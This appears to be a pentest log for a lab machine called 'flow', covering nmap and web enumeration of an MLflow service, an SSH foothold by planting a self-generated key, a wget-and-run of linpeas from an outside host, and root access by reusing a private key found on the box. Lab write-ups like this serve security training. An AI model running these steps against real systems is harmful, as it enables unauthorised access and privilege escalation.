flow
๐งช Pentest Log: {{date:2025-07-31}}
๐ Target Information
- Machine Name: flow
- IP Address: 192.168.238.104
- Operating System: Linux
ip=192.168.238.104
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
ssh -i id_rsa remi@$ip
Port 5000
Web Content Enumeration
MLflow 2.9.2
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
๐ฃ Exploitation / Foothold
Tool / Script Used:
SSH
Upload a self generated public key to the .ssh folder, then ssh into the victim
ssh-keygen -t rsa -b 4096 -f id_rsa
mv id_rsa.pub authorized_keys
chmod 600 id_rsa
๐งฌ Privilege Escalation
๐ค Current Access
- User: remi
- Groups: remi
- Shell Type: ssh
๐ Enumeration
Linpeas:
wget http://192.168.45.163/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
found the ./ssh/keys/root
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Private Key Reuse
- Target Binary/Service: ssh
- Reference / Source: N/A
๐ง Exploit Steps
- Smash to root
ssh -o IdentitiesOnly=yes -i /home/remi/.ssh/keys/root root@127.0.0.1